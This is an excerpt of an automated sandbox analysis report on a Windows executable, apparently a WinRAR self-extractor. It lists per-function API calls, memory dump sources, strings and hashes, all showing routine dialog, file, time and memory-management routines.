                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D899AF
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D899DC
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D899F1
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00D89A02
                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00D89A0B
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D89A1F
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D89A31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                      • String ID: LICENSEDLG
                                                                                      • API String ID: 3214253823-2177901306
                                                                                      • Opcode ID: 80dce032a90d4a89b113396a31a0bc505f9ea72389a104ad409a5568573f5066
                                                                                      • Instruction ID: 88a37c639d6d55a8239fdcd88a160150f21d924c2df029fb2b3a7e3defda9e51
                                                                                      • Opcode Fuzzy Hash: 80dce032a90d4a89b113396a31a0bc505f9ea72389a104ad409a5568573f5066
                                                                                      • Instruction Fuzzy Hash: 2421C932240305BFD6117B69ED45E7B7BADEB47B94F094108F681E2290CB66DC01DB76
                                                                                      Function 00D7922D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D79232
                                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D79255
                                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D79274
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      • _swprintf.LIBCMT ref: 00D79310
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D79385
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D793C1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                      • String ID: rtmp%d
                                                                                      • API String ID: 2111052971-3303766350
                                                                                      • Opcode ID: b5341d3c85541a9f47f295630e64374173384b9e423e7d3394bceebdb574da71
                                                                                      • Instruction ID: e0b339d78827a9343367faa2af7180fc40a4f315a462febba30bb70b58cd6579
                                                                                      • Opcode Fuzzy Hash: b5341d3c85541a9f47f295630e64374173384b9e423e7d3394bceebdb574da71
                                                                                      • Instruction Fuzzy Hash: CD416B72911258A6DF20FB60CDA5EEEB77CEF45380F0480AAB50DE3142FA349B458B74
                                                                                      Function 00D87EE5 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00D88705,?), ref: 00D87FBA
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00D87FDB
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00D88002
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                      • API String ID: 4094277203-4209811716
                                                                                      • Opcode ID: 2737e1a692b3636a7ccce20961a5503ed90257f71c104309e7b35927b74dc10a
                                                                                      • Instruction ID: 477917241c72b2b2724be13b7813c7353e9f38a178d1d23f3772dd55415f6e43
                                                                                      • Opcode Fuzzy Hash: 2737e1a692b3636a7ccce20961a5503ed90257f71c104309e7b35927b74dc10a
                                                                                      • Instruction Fuzzy Hash: C431F0721083117EEB25BB649C06FABB79CDF52720F24410AF614961C2EFB0D909C7B6
                                                                                      Function 00D87D96 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00D87DAF
                                                                                      • GetTickCount.KERNEL32 ref: 00D87DCD
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D87DE3
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D87DF7
                                                                                      • TranslateMessage.USER32(?), ref: 00D87E02
                                                                                      • DispatchMessageW.USER32(?), ref: 00D87E0D
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00D87EBD
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00D87EC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4150546248-0
                                                                                      • Opcode ID: f867ac239ac7afcdd8d46eddcc1ba13bd032d56bc3161be143708233b2ab0163
                                                                                      • Instruction ID: 014df8c6555e8c6df8b1f3085ee239cfd485794c9cbc0df82a6db7e7724f7d66
                                                                                      • Opcode Fuzzy Hash: f867ac239ac7afcdd8d46eddcc1ba13bd032d56bc3161be143708233b2ab0163
                                                                                      • Instruction Fuzzy Hash: 35417871208306AFD711EF69C88896BBBE9EF89704B14086DF546C7260DB71EC49CB72
                                                                                      Function 00D7FE20 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __aulldiv.LIBCMT ref: 00D7FE33
                                                                                        • Part of subcall function 00D7A8E0: GetVersionExW.KERNEL32(?), ref: 00D7A905
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00D7FE5C
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00D7FE6E
                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D7FE7B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D7FE91
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D7FE9D
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7FED3
                                                                                      • __aullrem.LIBCMT ref: 00D7FF5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                      • String ID:
                                                                                      • API String ID: 1247370737-0
                                                                                      • Opcode ID: eecc66e8500ec29f60e515e318f52ab8e388bfcdef08a11946cf95aaec72c401
                                                                                      • Instruction ID: 67e14d210c68e869f537ffed0c416b7cadfc44a46492d73cdf884a3a38d9039a
                                                                                      • Opcode Fuzzy Hash: eecc66e8500ec29f60e515e318f52ab8e388bfcdef08a11946cf95aaec72c401
                                                                                      • Instruction Fuzzy Hash: 02413CB24083059FC320DF65C8809ABFBF9FF88714F048A2EF59692250E735E548DB66
                                                                                      Function 00D8B0D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00D8B0EF
                                                                                      • _swprintf.LIBCMT ref: 00D8B123
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • SetDlgItemTextW.USER32(?,00000066,00DB3122), ref: 00D8B143
                                                                                      • _wcschr.LIBVCRUNTIME ref: 00D8B176
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D8B257
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                      • String ID: %s%s%u
                                                                                      • API String ID: 2892007947-1360425832
                                                                                      • Opcode ID: d0ce88d36a512ffb7b93a100274bad904bcb2138d6df8223c8dfa36bbc0d2518
                                                                                      • Instruction ID: 38a1bdd57363d5b8b4b05851c855453ea5a82517b5c8c046847e6c2ce53a3010
                                                                                      • Opcode Fuzzy Hash: d0ce88d36a512ffb7b93a100274bad904bcb2138d6df8223c8dfa36bbc0d2518
                                                                                      • Instruction Fuzzy Hash: D2417B72900319AEEF25EB64DC85EEE77BCEB08350F0440A6E409EA151EB709B848F74
                                                                                      Function 00D7C91F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                      • String ID: %08x
                                                                                      • API String ID: 1593746830-3682738293
                                                                                      • Opcode ID: 630a02c563a1bb4cf45066e56c67a161e9acc2e00d64d42fbcd1f7ce674dc97b
                                                                                      • Instruction ID: 337026122e0e1206159b1bb88c62ea1468a358ff190cc3cf287a1a1344ffab45
                                                                                      • Opcode Fuzzy Hash: 630a02c563a1bb4cf45066e56c67a161e9acc2e00d64d42fbcd1f7ce674dc97b
                                                                                      • Instruction Fuzzy Hash: 4341D332914344AEE730A624CC49ABB67DCDB85711F08852EF98CA7182F674DD04C672
                                                                                      Function 00D952F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID: d0F
                                                                                      • API String ID: 269201875-1238022483
                                                                                      • Opcode ID: 3183e21e1e5489103b106c5175bddc17f586603fdd4ce21a6ab65ac44297ce1a
                                                                                      • Instruction ID: d0d40d5f611998f78df63b0b1a238eb297f1080c83dc1955ef499e94f74e71cb
                                                                                      • Opcode Fuzzy Hash: 3183e21e1e5489103b106c5175bddc17f586603fdd4ce21a6ab65ac44297ce1a
                                                                                      • Instruction Fuzzy Hash: 7A41CD32A00700ABCF11DF78D881A6AB3A1EF85310F2545A9E505EB385DB71AD01CBA0
                                                                                      Function 00D8859C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00D885B5
                                                                                      • GetWindowRect.USER32(?,?), ref: 00D885DA
                                                                                      • ShowWindow.USER32(?,00000005,?), ref: 00D88671
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00D88679
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00D8868F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$RectText
                                                                                      • String ID: RarHtmlClassName
                                                                                      • API String ID: 3937224194-1658105358
                                                                                      • Opcode ID: 116e0959568a121f369672cbeda3fad405ffe8625fdef8e283a1a357697c79fd
                                                                                      • Instruction ID: ade02628962481d4043e170db1a347b8863efef2064ee1eec1d117871ab9e1b3
                                                                                      • Opcode Fuzzy Hash: 116e0959568a121f369672cbeda3fad405ffe8625fdef8e283a1a357697c79fd
                                                                                      • Instruction Fuzzy Hash: 6831AE32500314AFC721AF68DD49B2BBBA9EF49701F044559FD49EA292DB30E910DBB2
                                                                                      Function 00D9930F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D992D3: _free.LIBCMT ref: 00D992FC
                                                                                      • _free.LIBCMT ref: 00D9935D
                                                                                        • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
                                                                                        • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
                                                                                      • _free.LIBCMT ref: 00D99368
                                                                                      • _free.LIBCMT ref: 00D99373
                                                                                      • _free.LIBCMT ref: 00D993C7
                                                                                      • _free.LIBCMT ref: 00D993D2
                                                                                      • _free.LIBCMT ref: 00D993DD
                                                                                      • _free.LIBCMT ref: 00D993E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                      • Instruction ID: be356baf7d461f9cb9fb5111984a18eb130596ff27422bba1bec7ccb71c149a8
                                                                                      • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                      • Instruction Fuzzy Hash: 3F111A71A42B04BAEF21BBB4DC06FCBB798DF00710F804929B299A6052DA65A5048B74
                                                                                      Function 00D90C14 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00D90C0B,00D8E662), ref: 00D90C22
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D90C30
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D90C49
                                                                                      • SetLastError.KERNEL32(00000000,?,00D90C0B,00D8E662), ref: 00D90C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: d4509ae2bee272b7ffbb850b343e3f19b90fe2c51a7b5868bb43fd24c41bccf1
                                                                                      • Instruction ID: f722b37c4128da37b20b45ebeb1c5de32276e3d3bd640d1d0a19dffa0691fae4
                                                                                      • Opcode Fuzzy Hash: d4509ae2bee272b7ffbb850b343e3f19b90fe2c51a7b5868bb43fd24c41bccf1
                                                                                      • Instruction Fuzzy Hash: 9E01A7372497266EEF6527B87C859372E48EB027B5B34033AF524951E1EF214C0091B4
                                                                                      Function 00D8C7FD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                      • API String ID: 0-1718035505
                                                                                      • Opcode ID: e8ecbb9c569a4d7a5cb3efbb4d25fd601b80e81fa27b82987d4aa4b79857771d
                                                                                      • Instruction ID: ebb5b71f8e308b078776daca69ff261a44ac59b73a18388b94f5f31af6914c95
                                                                                      • Opcode Fuzzy Hash: e8ecbb9c569a4d7a5cb3efbb4d25fd601b80e81fa27b82987d4aa4b79857771d
                                                                                      • Instruction Fuzzy Hash: 3B01F476BE1323EB4F202E745C89AA727A89B03795719213AE450D3340EB30C848ABF5
                                                                                      Function 00D94ADF Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94A90,?,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002), ref: 00D94AFF
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94B12
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D94A90,?,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002,00000000), ref: 00D94B35
                                                                                      Strings
                                                                                      Memory Dump Source
